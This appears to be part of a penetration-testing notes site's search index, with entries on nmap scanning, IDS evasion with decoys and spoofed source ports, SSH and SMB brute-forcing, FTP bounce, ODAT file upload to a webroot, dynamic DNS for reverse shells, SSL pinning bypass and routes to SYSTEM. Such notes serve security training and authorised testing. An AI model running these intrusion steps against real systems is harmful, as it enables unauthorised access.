\n\n# Full scanner\nnmap -sC -sV -p- $ip  \n# The script scan `-sC` flag causes `Nmap` to report the server headers `http-server-header` page and the page title `http-title` for any web page hosted on the webserver.\n\n\n# UDP quick\nnmap -sU -sV  $ip\n\n# Called ACK scan. Returns if the port is filtered or not. Useful to determine if there is a firewall.\nnmap -sA $ip \n\n# It sends an ACK packet. In the response we pay attention to the window size of the TCP header. If the window size is different from zero, the port is open. If it is zero, then the port is either closed or filtered. \nnmap -sW $ip\n

To redirect results to a file, append `> targetfile.txt` to the command.

    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#search-and-run-a-script-in-nmap","title":"Search and run a script in nmap","text":"

    NSE: Nmap Scripting Engine.

    # All scripts are located under:\n/usr/share/nmaps/script\n\n\nlocate -r nse$|grep <term>\n# if this doesn\u2019t work, update the db with:\nsudo updatedb\n\n\n# Also:\nlocate scripts/<nameOfservice>\n

    Run a script:

    # Run default scripts \nnmap $ip -sC\n\n# Run  scripts from a category. See categories below\nnmap $ip --script <category>\n\n# Run specific scripts\nnmap --script <script-name>,<script-name>,<script-name> -p<port> $ip\n

    NSE (Nmap Script Engine) provides us with the possibility to create scripts in Lua for interaction with certain services. There are a total of 14 categories into which these scripts can be divided:

| Category | Description |
| -------- | ----------- |
| auth | Determination of authentication credentials. |
| broadcast | Scripts used for host discovery by broadcasting; the discovered hosts can be automatically added to the remaining scans. |
| brute | Executes scripts that try to log in to the respective service by brute-forcing with credentials. |
| default | Default scripts executed by using the -sC option. Syntax: sudo nmap $ip -sC |
| discovery | Evaluation of accessible services. |
| dos | Checks services for denial of service vulnerabilities; used less as it harms the services. |
| exploit | Tries to exploit known vulnerabilities for the scanned port. |
| external | Scripts that use external services for further processing. |
| fuzzer | Identifies vulnerabilities and unexpected packet handling by sending different fields, which can take much time. |
| intrusive | Intrusive scripts that could negatively affect the target system. |
| malware | Checks if some malware infects the target system. |
| safe | Defensive scripts that do not perform intrusive and destructive access. |
| version | Extension for service detection. |
| vuln | Identification of specific vulnerabilities. |

","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#general-vulnerability-assessment","title":"General vulnerability assessment","text":"
    sudo nmap $ip -p 80 -sV --script vuln \n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#port-21-footprinting-ftp","title":"Port 21: footprinting FTP","text":"
# Locate all ftp scripts related\nfind / -type f -name ftp* 2>/dev/null | grep scripts\n\n# Run a general scan: version detection (-sV), default scripts (-sC), aggressive mode (-A)\nsudo nmap -sV -p21 -sC -A $ip\n# ftp-anon NSE script checks whether the FTP server allows anonymous access.\n# ftp-syst, for example, executes the `STAT` command, which displays information about the FTP server status.\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#port-22-attack-a-ssh-connection","title":"Port 22: attack a ssh connection","text":"
    nmap $ip -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=/usr/share/nmap/nselib/data/passwords.lst\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#ports-137-138-139-445-footprinting-smb","title":"Ports 137, 138, 139, 445: footprinting SMB","text":"
    sudo nmap $ip -sV -sC -p139,445\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#grab-banners-of-services","title":"Grab banners of services","text":"
    # Grab banner of services in an IP\nnmap -sV --script=banner $ip\n\n# Grab banners of services in a range\nnmap -sV --script=banner $ip/24\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#enumerate-samba-service-smb","title":"Enumerate samba service (smb)","text":"
# 1. Search for existing script for smb enumeration\nlocate -r nse$|grep <term>\n\n# 2. Select smb-enum-shares and run it\nnmap --script=smb-enum-shares $ip\n\n# 3. Retrieve users\nnmap --script=smb-enum-users $ip\n\n# 4. Retrieve groups with passwords and user\nnmap --script=smb-brute $ip\n\n# Interact with the SMB service to extract the reported operating system version\nnmap --script smb-os-discovery.nse -p445 $ip\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#performance","title":"Performance","text":"","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#introducing-delays-or-timeouts","title":"Introducing delays or Timeouts","text":"

    When Nmap sends a packet, it takes some time (Round-Trip-Time - RTT) to receive a response from the scanned port. Generally, Nmap starts with a high timeout (--min-RTT-timeout) of 100ms.

    # While connecting to the service, we noticed that the connection took longer than usual (about 15 seconds). There are some services whose connection speed, or response time, can be configured. Now that we know that an FTP server is running on this port, we can deduce the origin of our \"failed\" scan. We could confirm this again by specifying the minimum `probe round trip time` (`--min-rtt-timeout`) in Nmap to 15 or 20 seconds and rerunning the scan.\nnmap $IP --min-rtt-timeout 15\n\n# Optimized RTT\nsudo nmap IP/24 -F --initial-rtt-timeout 50ms --max-rtt-timeout 100ms\n# -F: Scans top 100 ports.\n# --initial-rtt-timeout 50ms: Sets the specified time value as initial RTT timeout.\n# --max-rtt-timeout 100ms: Sets the specified time value as maximum RTT timeout.\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#max-retries","title":"Max Retries","text":"

The default value for the retry rate is 10. With --max-retries 0, if Nmap does not receive a response for a port, it will not send any more packets to that port, and the port will be skipped.

    sudo nmap $ip/24 -F --max-retries 0\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#rates","title":"Rates","text":"

    When setting the minimum rate (--min-rate) for sending packets, we tell Nmap to simultaneously send the specified number of packets.

    sudo nmap $ip/24 -F --min-rate 300\n# --min-rate 300 Sets the minimum number of packets to be sent per second.\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#timing","title":"Timing","text":"

Nmap offers six different timing templates (-T <0-5>), the default being -T 3.

| Flag | Mode |
| ---- | ---- |
| -T 0 | Paranoid |
| -T 1 | Sneaky |
| -T 2 | Polite |
| -T 3 | Normal |
| -T 4 | Aggressive |
| -T 5 | Insane |

    More on nmap documentation.

    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#firewall-and-idsips-evasion-with-nmap","title":"Firewall and IDS/IPS Evasion with nmap","text":"

    An adversary uses TCP ACK segments to gather information about firewall or ACL configuration. The purpose of this type of scan is to discover information about filter configurations rather than port state.

1. An adversary sends TCP packets with the ACK flag set and a sequence number of zero (meaning they are not associated with an existing connection) to target ports.

    2. An adversary uses the response from the target to determine the port's state.

  • Filtered port: The target ignores the packets and drops them. No response or ICMP error code is returned.
  • Unfiltered port: The target rejects the packets and returns an RST flag and different types of ICMP error codes (or none at all): Net Unreachable, Net Prohibited, Host Unreachable, Host Prohibited, Port Unreachable. If an RST packet is received, the target port is either closed or the ACK was sent out-of-sync.

    Unlike outgoing connections, all connection attempts (with the SYN flag) from external networks are usually blocked by firewalls. However, the packets with the ACK flag are often passed by the firewall because the firewall cannot determine whether the connection was first established from the external network or the internal network.
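For example (ports are illustrative; --packet-trace shows the RST or silence that reveals the filtering):

sudo nmap $ip -p 21,22,25 -sA -Pn -n --disable-arp-ping --packet-trace\n# unfiltered: an RST came back, so the firewall let our ACK through\n# filtered: no response or an ICMP error, so the packet was dropped\n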

    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#detect-a-waf","title":"Detect a WAF","text":"
nmap -p 80 --script http-waf-detect $ip \n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#decoys","title":"Decoys","text":"

    There are cases in which administrators block specific subnets from different regions in principle. Decoys can be used for SYN, ACK, ICMP scans, and OS detection scans.

    With the Decoy scanning method (-D), Nmap generates various random IP addresses inserted into the IP header to disguise the origin of the packet sent.

sudo nmap $ip -p 80 -sS -Pn -n --disable-arp-ping --packet-trace -D RND:5\n# -D RND:5  Generates five random decoy IP addresses; our real source IP is inserted among them.\n

Manually specify the source IP address (-S) to reach services that are only accessible from individual subnets:

    sudo nmap 10.129.2.28 -n -Pn -p 445 -O -S 10.129.2.200 -e tun0\n# -n: Disables DNS resolution.\n# -Pn: Disables ICMP Echo requests.\n# -p 445: Scans only the specified ports.\n# -O: Performs operation system detection scan.\n# -S: Scans the target by using different source IP address.\n# -e tun0: Sends all requests through the specified interface.\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#dns-proxying","title":"DNS proxying","text":"

    The DNS queries are made over the UDP port 53. The TCP port 53 was previously only used for the so-called \"Zone transfers\" between the DNS servers or data transfer larger than 512 bytes. More and more, this is changing due to IPv6 and DNSSEC expansions. These changes cause many DNS requests to be made via TCP port 53.

We can bypass the demilitarized zone (DMZ) by specifying DNS servers ourselves (we can use the company's DNS server): --dns-server <ns>,<ns>

    We can also use TCP port 53 as a source port (--source-port) for our scans. If the administrator uses the firewall to control this port and does not filter IDS/IPS properly, our TCP packets will be trusted and passed through.

    Example:

    # Simple SYS-Scan of a filtered port\nsudo nmap $ip -p50000 -sS -Pn -n --disable-arp-ping --packet-trace\n# PORT      STATE    SERVICE\n# 50000/tcp filtered ibm-db2\n\n\n# SYN-Scan From DNS Port\nsudo nmap $ip -p50000 -sS -Pn -n --disable-arp-ping --packet-trace --source-port 53\n# PORT      STATE SERVICE\n# 50000/tcp open  ibm-db2\n

    Following the example, a possible exploitation for this weak configuration would be:

    nc -nv -p 53 $ip 50000\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#udp-scans-not-working-on-vpn-connections","title":"UDP scans not working on VPN connections","text":"

    Explanation from https://www.reddit.com/r/nmap/comments/u08lud/havin_a_rough_go_of_trying_to_scan_a_subnet_with/:

    As others have pointed out, scanning over a VPN link means you are limited to\u00a0internet-layer\u00a0interactions and operations. The \"V\" in VPN stands for Virtual, and means that you are not actually on the same link as the other hosts in your subnet, so you can't get information about their link-layer connections any more than they can know whether you've connected to the VPN via Starbucks WiFi, an Ethernet cable, or a dial-up modem.

    You are further limited by the fact that Windows does not offer a general-purpose raw socket interface, so Nmap can't craft special packets at the network/internet layer. Usually we work around this by crafting Ethernet (link-layer) frames and injecting those with\u00a0Npcap, but VPN links do not use Ethernet frames, so that method doesn't work. We hope to be able to add this functionality in the future, but for now, VPNs are tricky to use with Npcap, and we haven't implemented PPTP or other VPN framing in Nmap to make it work. You can still do TCP Connect scanning (-sT), run most NSE scripts (-sC\u00a0or\u00a0--script), and do service version detection (-sV), but things like TCP SYN scan (-sS), UDP scanning (-sU), OS detection (-O), and traceroute (--traceroute) will not work.

    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#how-nmap-works","title":"How nmap works","text":"","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#ports","title":"Ports","text":"

    Open port:

    This indicates that the connection to the scanned port has been established. These connections can be TCP connections, UDP datagrams as well as SCTP associations.

    Filtered port:

    Nmap cannot correctly identify whether the scanned port is open or closed because either no response is returned from the target for the port or we get an error code from the target.

Closed port:

    When the port is shown as closed, the TCP protocol indicates that the packet we received back contains an RST flag. This scanning method can also be used to determine if our target is alive or not.

    Unfiltered port:

    This state of a port only occurs during the TCP-ACK scan and means that the port is accessible, but it cannot be determined whether it is open or closed.

open|filtered port:

    If we do not get a response for a specific port, Nmap will set it to that state. This indicates that a firewall or packet filter may protect the port.

    closed|filtered port:

    This state only occurs in the IP ID idle scans and indicates that it was impossible to determine if the scanned port is closed or filtered by a firewall.

    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#probes-for-host-discovery","title":"Probes for HOST discovery","text":"
    TCP SYN probe (-PS <portlist>)\nTCP ACK probe (-PA <portlist>)\nUDP probe (-PU <portlist>)\nICMP Echo Request/Ping (-PE)\nICMP Timestamp Request (-PP)\nICMP Netmask Request (-PM)\n

    List of the most filtered ports: 80, 25, 22, 443, 21, 113, 23, 53, 554, 3389, 1723. These are valuable ping ports.

    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#scans","title":"Scans","text":"","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#-ss-or-tcp-syn-scan","title":"-sS (or TCP SYN scan)","text":"

By default, Nmap scans the top 1000 TCP ports with the SYN scan (-sS). The SYN scan is only the default when we run Nmap as root, because of the socket permissions required to create raw TCP packets; Nmap substitutes a connect scan if the user does not have the privileges to send raw packets (raw packets require root access on Unix). Unprivileged users can only execute connect and FTP bounce scans.

    • No connection established, but we got our response.
    • Technique referred as half-open scanning, because you don't open a full TCP connection.
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#-st-or-tcp-connect-scan","title":"-sT (or TCP Connect scan)","text":"

TCP connect scan is the default TCP scan type when SYN scan is not an option (when not running with privileges). The Nmap TCP Connect Scan (-sT) uses the TCP three-way handshake to determine if a specific port on a target host is open or closed. The scan sends a SYN packet to the target port and waits for a response. The port is considered open if it responds with a SYN-ACK packet and closed if it responds with an RST packet.

    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#-sn-a-null-scan","title":"-sN (A NULL scan)","text":"

In the SYN message that nmap sends, the TCP flags header is set to 0 (no flags set).

    If the response is:

• none: the port is open or filtered.
• RST: the port is closed.
• An ICMP unreachable error: the port is filtered.
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#-sa-ack-scan","title":"-sA (ACK scan)","text":"

Returns whether the port is filtered or not. It's useful to detect a firewall: filtered ports reveal the existence of some kind of firewall.

    A variation of the TCP ACK scan is the TCP Windows scan.

    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#-sw-tcp-windows-scan","title":"-sW (TCP Windows scan)","text":"

It also sends an ACK packet. In the response, we pay attention to the window size of the TCP header:

• If the window size is different from 0, the port is open.
• If the window size is 0, the port is either closed or filtered.
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#how-to-identify-operating-system-using-ttl-value-and-ping-command","title":"How To Identify Operating System Using TTL Value And Ping Command","text":"

    After running:

    sudo nmap $ip -sn -oA host -PE --packet-trace --disable-arp-ping \n

    We can get:

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-15 00:12 CEST\nSENT (0.0107s) ICMP [10.10.14.2 > 10.129.2.18 Echo request (type=8/code=0) id=13607 seq=0] IP [ttl=255 id=23541 iplen=28 ]\nRCVD (0.0152s) ICMP [10.129.2.18 > 10.10.14.2 Echo reply (type=0/code=0) id=13607 seq=0] IP [ttl=128 id=40622 iplen=28 ]\nNmap scan report for 10.129.2.18\nHost is up (0.086s latency).\nMAC Address: DE:AD:00:00:BE:EF\nNmap done: 1 IP address (1 host up) scanned in 0.11 seconds\n

You can quickly detect whether a system is running Linux, Windows, or another OS by looking at the TTL value in the output of the ping command. You don't need any extra applications to detect a remote system's OS. The default initial TTL value for Linux/Unix is 64, and the TTL value for Windows is 128.
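For a quick manual check (TTL decreases with each hop and can be customized, so treat it as a heuristic):

# Send a single ICMP echo request and read the ttl= field in the reply\nping -c 1 $ip\n# ttl close to 64  -> likely Linux/Unix\n# ttl close to 128 -> likely Windows\n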

    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#saving-the-results","title":"Saving the results","text":"
    -oN: Normal output with .nmap file extension\n-oG: Grepable output with the .gnmap file extension\n-oX: XML output  with the .xml file extension\n-oA: Save results in all formats\n

    With the XML output, we can easily create HTML reports. To convert the stored results from XML format to HTML, we can use the tool xsltproc.

    xsltproc target.xml -o target.html\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#quick-techniques","title":"Quick techniques","text":"","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#host-enumeration-determining-if-host-is-alive-with-arp-ping","title":"Host Enumeration: Determining if host is alive with ARP ping","text":"

    It can be done with --packet-trace or with --reason.

    sudo nmap <IP> -sn -oA host -PE --packet-trace\n# -sn   Disables port scanning.\n# -oA host  Stores the results in all formats starting with the name 'host'.\n# -PE   Performs the ping scan by using 'ICMP Echo requests' against the target.\n# --packet-trace    Shows all packets sent and received\n
    sudo nmap <IP> -sn -oA host -PE --reason\n# -sn   Disables port scanning.\n# -oA host  Stores the results in all formats starting with the name 'host'.\n# -PE   Performs the ping scan by using 'ICMP Echo requests' against the target.\n# --reason  Displays the reason for specific result.\n

    To disable ARP requests and scan our target with the desired ICMP echo requests, we can disable ARP pings by setting the \"--disable-arp-ping\" option.

    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#port-scanning-having-a-clear-view-of-a-syn-scan-on-a-port","title":"Port scanning: having a clear view of a SYN scan on a port","text":"

    To have a clear view of the SYN scan on port 21, disable the ICMP echo requests (-Pn), DNS resolution (-n), and ARP ping scan (--disable-arp-ping).

    sudo nmap <IP> -p 21 --packet-trace -Pn -n --disable-arp-ping\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#performing-a-ftp-bounce-attack","title":"Performing a FTP bounce attack","text":"

    An FTP bounce attack is a network attack that uses FTP servers to deliver outbound traffic to another device on the network. For instance, consider we are targeting an FTP server FTP_DMZ exposed to the internet. Another device within the same network, Internal_DMZ, is not exposed to the internet. We can use the connection to the FTP_DMZ server to scan Internal_DMZ using the FTP bounce attack and obtain information about the server's open ports.

    nmap -Pn -v -n -p80 -b anonymous:password@$ipFTPdmz $ipINTERNALdmz\n# -b: the Nmap -b flag can be used to perform an FTP bounce attack\n
    ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"noip/","title":"noip","text":"

    When coding a reverse shell, you don't need to hardcode the IP address of the attacker machine. Instead, you can use a Dynamic DNS provider such as https://www.noip.com/. To keep this provider informed of our attacker machine's public IP address, we install a Linux Dynamic Update Client (an agent) on our Kali box.

    ","tags":["pentesting","python"]},{"location":"noip/#install-dynamic-update-client-on-linux","title":"Install Dynamic Update Client on Linux","text":"

    As root user:

    cd /usr/local/src/\nwget http://www.noip.com/client/linux/noip-duc-linux.tar.gz\ntar xf noip-duc-linux.tar.gz\ncd noip-2.1.9-1/\nmake install\n
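    Once compiled and installed, the client is configured and started roughly as follows (a sketch; noip2 prompts for your No-IP account credentials during configuration):

    /usr/local/bin/noip2 -C\n# -C  create the configuration file interactively\n/usr/local/bin/noip2\n# start the update client in the background\n/usr/local/bin/noip2 -S\n# -S  display info about running clients\n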
    ","tags":["pentesting","python"]},{"location":"nslookup/","title":"nslookup","text":"

    With Nslookup, we can search for domain name servers on the Internet and ask them for information about hosts and domains.

    # Query `A` records by submitting a domain name: default behaviour\nnslookup $TARGET\n\n# We can use the `-query` parameter to search specific resource records\n# Querying: A Records for a Subdomain\nnslookup -query=A $TARGET\n\n# Querying: PTR Records for an IP Address\nnslookup -query=PTR 31.13.92.36\n\n# Querying: ANY Existing Records\nnslookup -query=ANY $TARGET\n\n# Querying: TXT Records\nnslookup -query=TXT $TARGET\n\n# Querying: MX Records\nnslookup -query=MX $TARGET\n\n#  Specify a nameserver if needed by adding it as a second argument: nslookup $TARGET <nameserver/IP>\n

    References: - nslookup (https://linux.die.net/man/1/nslookup)

    ","tags":["pentesting","dns","enumeration","tools"]},{"location":"nt-authority-system/","title":"NT Authority System","text":"

    The LocalSystem account NT AUTHORITY\SYSTEM is a built-in account in Windows operating systems, used by the service control manager. It has the highest level of access in the OS (and can be made even more powerful with Trusted Installer privileges). This account has more privileges than a local administrator account and is used to run most Windows services. It is also very common for third-party services to run in the context of this account by default. The SYSTEM account has the following privileges:

    SE_ASSIGNPRIMARYTOKEN_NAME, SE_AUDIT_NAME, SE_BACKUP_NAME, SE_CHANGE_NOTIFY_NAME, SE_CREATE_GLOBAL_NAME, SE_CREATE_PAGEFILE_NAME, SE_CREATE_PERMANENT_NAME, SE_CREATE_TOKEN_NAME, SE_DEBUG_NAME, SE_IMPERSONATE_NAME, SE_INC_BASE_PRIORITY_NAME, SE_INCREASE_QUOTA_NAME, SE_LOAD_DRIVER_NAME, SE_LOCK_MEMORY_NAME, SE_MANAGE_VOLUME_NAME, SE_PROF_SINGLE_PROCESS_NAME, SE_RESTORE_NAME, SE_SECURITY_NAME, SE_SHUTDOWN_NAME, SE_SYSTEM_ENVIRONMENT_NAME, SE_SYSTEMTIME_NAME, SE_TAKE_OWNERSHIP_NAME, SE_TCB_NAME, SE_UNDOCK_NAME

    The SYSTEM account on a domain-joined host can enumerate Active Directory by impersonating the computer account, which is essentially a special user account. If you land on a domain-joined host with SYSTEM privileges during an assessment and cannot find any useful credentials in memory or other data on the machine, there are still many things you can do. Having SYSTEM-level access within a domain environment is nearly equivalent to having a domain user account. The only real limitation is not being able to perform cross-trust Kerberos attacks such as Kerberoasting.

    There are several ways to gain SYSTEM-level access on a host, including but not limited to:

    • Remote Windows exploits such as EternalBlue or BlueKeep.
    • Abusing a service running in the context of the SYSTEM account.
    • Abusing SeImpersonate privileges using RottenPotatoNG against older Windows systems, Juicy Potato, or PrintSpoofer if targeting Windows 10/Windows Server 2019.
    • Local privilege escalation flaws in Windows operating systems such as the Windows 10 Task Scheduler 0day.
    • PsExec with the -s flag
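    As an illustration of the last item, Sysinternals PsExec can spawn a SYSTEM shell from an already-elevated local prompt (a minimal sketch):

    PsExec.exe -accepteula -i -s cmd.exe\n# -i  interactive session\n# -s  run the process as the LocalSystem account\nwhoami\n# nt authority\\system\n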
    ","tags":["active directory","ldap","windows"]},{"location":"objection/","title":"Objection","text":"

    What does it do? It establishes a regular ADB connection and starts the Frida server on the device. If you are using a rooted device, you need to select the application you want to test with the --gadget option.

    ","tags":["mobile pentesting"]},{"location":"objection/#installation","title":"Installation","text":"
    pip3 install objection\n
    ","tags":["mobile pentesting"]},{"location":"objection/#usage","title":"Usage","text":"

    For the metromadrid app, this would be:

    objection --gadget es.metromadrid.metroandroid explore\n
    ","tags":["mobile pentesting"]},{"location":"objection/#basic-commands","title":"Basic commands","text":"
    # Some interesting information (like passwords, paths...) could be found inside the environment.\nenv\n\nfile download <remotepath> [<localpath>]\nfile upload <localpath> [<remotepath>]\nimport <localpath frida-script>\n\n# Disable SSL pinning on android devices\nandroid sslpinningdisable\n
    ","tags":["mobile pentesting"]},{"location":"oci-fundamentals-preparation/","title":"Notes","text":"

    OCI has more than 80 services.

    Instead of regions and availability zones, in Oracle we have Regions and Availability Domains. And instead of data centers as the next level down, we have Fault Domains.

    "},{"location":"odat/","title":"odat - Oracle Database Attacking Tool","text":"

    Oracle Database Attacking Tool (ODAT) is an open-source penetration testing tool written in Python and designed to enumerate and exploit vulnerabilities in Oracle databases. It can be used to identify and exploit various security flaws in Oracle databases, including SQL injection, remote code execution, and privilege escalation.

    ","tags":["enumeration","snmp","port 161","tools"]},{"location":"odat/#installation","title":"Installation","text":"

    This script installs the needed packages and tools:

    #!/bin/bash\n\nsudo apt-get install libaio1 python3-dev alien python3-pip -y\ngit clone https://github.com/quentinhardy/odat.git\ncd odat/\ngit submodule init\ngit submodule update\nsudo apt install oracle-instantclient-basic oracle-instantclient-devel oracle-instantclient-sqlplus -y\npip3 install cx_Oracle\nsudo apt-get install python3-scapy -y\nsudo pip3 install colorlog termcolor pycryptodome passlib python-libnmap\nsudo pip3 install argcomplete && sudo activate-global-python-argcomplete\n

    Check installation with:

    ./odat.py -h\n
    ","tags":["enumeration","snmp","port 161","tools"]},{"location":"odat/#basic-usage","title":"Basic usage","text":"

    We can use odat.py from the ODAT tool to retrieve database names, versions, running processes, user accounts, vulnerabilities, misconfigurations, and more.

    ./odat.py all -s $ip\n

    Upload a web shell to the target:

    # Upload a web shell to the target. This requires the target to run a web server, and we need to know the exact location of the root directory for the webserver.\n\n## 1. Create a non-suspicious test file first\necho \"Oracle File Upload Test\" > testing.txt\n\n## 2. Upload the file to linux (/var/www/html) or windows (C:\\\\inetpub\\\\wwwroot):\n./odat.py utlfile -s $ip -d XE -U <user> -P <password> --sysdba --putFile C:\\\\inetpub\\\\wwwroot testing.txt ./testing.txt\n\n## 3. Test if the file upload approach worked with curl, or visit via browser.\ncurl -X GET http://$ip/testing.txt\n
    ","tags":["enumeration","snmp","port 161","tools"]},{"location":"odata-pentesting/","title":"Pentesting oData","text":"

    The Open Data Protocol (OData) is an open web protocol for querying and updating data. OData enables the creation of HTTP-based RESTful data services that can be used to publish and edit resources that are identified using uniform resource identifiers (URIs) with simple HTTP messages.

    ","tags":["oData","pentesting","webpentesting","Dynamics"]},{"location":"odata-pentesting/#the-service-metadata-document","title":"The Service Metadata Document","text":"

    It usually has this syntax:

    http://localhost:32026/OData/OData.svc/$metadata\n

    https://infosecwriteups.com/unauthorized-access-to-odata-entities-2k-bounty-from-microsoft-e070b2ef88c2

    The OData metadata is a data model of the system (consider it as information_schema in relational databases). For each metadata document we have entities (similar to tables in relational databases) and properties (similar to columns), as well as the relationships between different entity types. Each entity type has an entity key that is similar to the key in relational databases.\n
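    To illustrate, once the metadata reveals an entity set, its records can be queried directly over HTTP. A sketch, assuming a hypothetical entity set named Products on the example service above:

    # Retrieve the whole entity set\ncurl 'http://localhost:32026/OData/OData.svc/Products'\n\n# Retrieve a single entity by its entity key\ncurl 'http://localhost:32026/OData/OData.svc/Products(1)'\n\n# Standard OData query options: select properties and limit results\ncurl 'http://localhost:32026/OData/OData.svc/Products?$select=Name,Price&$top=5'\n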
    ","tags":["oData","pentesting","webpentesting","Dynamics"]},{"location":"onesixtyone/","title":"onesixtyone - Fast and simple SNMP scanner","text":"

    See SNMP for details about the protocol.

    ","tags":["enumeration","snmp","port 161","tools"]},{"location":"onesixtyone/#installation","title":"Installation","text":"

    Install via apt, or build from the GitHub repo: https://github.com/trailofbits/onesixtyone.

    sudo apt install onesixtyone\n
    ","tags":["enumeration","snmp","port 161","tools"]},{"location":"onesixtyone/#basic-usage","title":"Basic usage","text":"
    onesixtyone -c /opt/useful/SecLists/Discovery/SNMP/snmp.txt $ip\n
    ","tags":["enumeration","snmp","port 161","tools"]},{"location":"openssl/","title":"openSSL - Cryptography and SSL/TLS Toolkit","text":"

    openSSL Website.

    ","tags":["openssl"]},{"location":"openssl/#basic-usage","title":"Basic usage","text":"
    openssl s_client -connect target.site:443\nHEAD / HTTP/1.0\n
    • Create self-signed certificates.
    • Encrypt/decrypt files.
    • Generate private/public keys.
    • Encrypt/decrypt files with public/private keys.
    # Pwnbox - Create a Self-Signed Certificate\nopenssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'\n\n# Encrypt a file\nopenssl enc -aes-256-cbc -iter 100000 -pbkdf2 -in sourceFile.txt -out outputFile.txt.enc\n# -iter 100000: Optional. Override the default iteration count with this option.\n# -pbkdf2: Optional. Use the Password-Based Key Derivation Function 2 algorithm.\n\n# Decrypt a file\nopenssl enc -d -aes-256-cbc -iter 100000 -pbkdf2 -in encryptedFile.enc -out outputFile.txt\n\n# Generate private key\nopenssl genrsa -aes256 -out private.pem 2048\n\n# Generate public key\nopenssl rsa -in private.pem -outform PEM -pubout -out public.pem\n\n# Encrypt a file with public key\nopenssl rsautl -encrypt -inkey public.pem -pubin -in file.txt -out file.enc\n# -pubin: the input key is a public key\n\n# Decrypt a file with private key\nopenssl rsautl -decrypt -inkey private.pem -in file.enc -out file.txt\n
    ","tags":["openssl"]},{"location":"openvas/","title":"OpenVAS","text":"

    OpenVAS by Greenbone Networks is a publicly available open-source vulnerability scanner. OpenVAS can perform network scans, including authenticated and unauthenticated testing.

    Scans may take 1-2 hours to finish.

    ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"openvas/#installation","title":"Installation","text":"
    # Update packages\nsudo apt-get update && sudo apt-get -y full-upgrade\n\n# Install the tool\nsudo apt-get install gvm\n\n# Initiate the setup process\nsudo gvm-setup\n\n# Check the installation\nsudo gvm-check-setup\n\n# Start OpenVAS\nsudo gvm-start\n

    OpenVAS stands for Open Vulnerability Assessment Scanner. Its interface is organized around assets (hosts, operating systems, TLS certificates, and so on) rather than scans; scans themselves are called Tasks.

    ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"openvas/#basic-usage","title":"Basic usage","text":"
    # Start OpenVAS\nsudo gvm-start\n

    Go to https://$ip:8080

    Documentation.

    • Base: This scan configuration is meant to enumerate information about the host's status and operating system information.
    • Discovery: Enumerate host's services, hardware, accessible ports, and software being used on the system.
    • Host Discovery: Determines whether the host is alive and what devices are active on the network. OpenVAS leverages ping to identify if the host is alive.
    • System Discovery: Enumerates the target host further than the 'Discovery Scan' and attempts to identify the operating system and hardware associated with the host.
    • Full and fast: This configuration is recommended by OpenVAS as the safest option and leverages intelligence to use the best NVT checks for the host(s) based on the accessible ports.

    There are various export formats for reporting purposes, including XML, CSV, PDF, ITG, and TXT. If you choose to export your report as XML, you can leverage various XML parsers to view the data in an easier-to-read format.

    ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"openvas/#reporting","title":"Reporting","text":"

    See openVAS Reporting.

    ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"openvasreporting/","title":"openVAS Reporting","text":"","tags":["reconnaissance","scanner","vulnerability assessment","reporting"]},{"location":"openvasreporting/#installation","title":"Installation","text":"

    Download from github repo: https://github.com/TheGroundZero/openvasreporting.

    # Install Python3 and pip3 before.\n\n# Clone git repository\ngit clone https://github.com/TheGroundZero/openvasreporting.git\n\n# Install required python packages\ncd openvasreporting\npip3 install pip --upgrade\npip3 install build --upgrade\npython -m build\n\n# Install module\npip3 install dist/OpenVAS_Reporting-X.x.x-py3-xxxx-xxx.whl\n

    Alternative with pip3

    # Install Python3 and pip3\napt(-get) install python3 python3-pip # Debian\n\n# Install the package\npip3 install OpenVAS-Reporting\n
    ","tags":["reconnaissance","scanner","vulnerability assessment","reporting"]},{"location":"openvasreporting/#basic-usage","title":"Basic usage","text":"
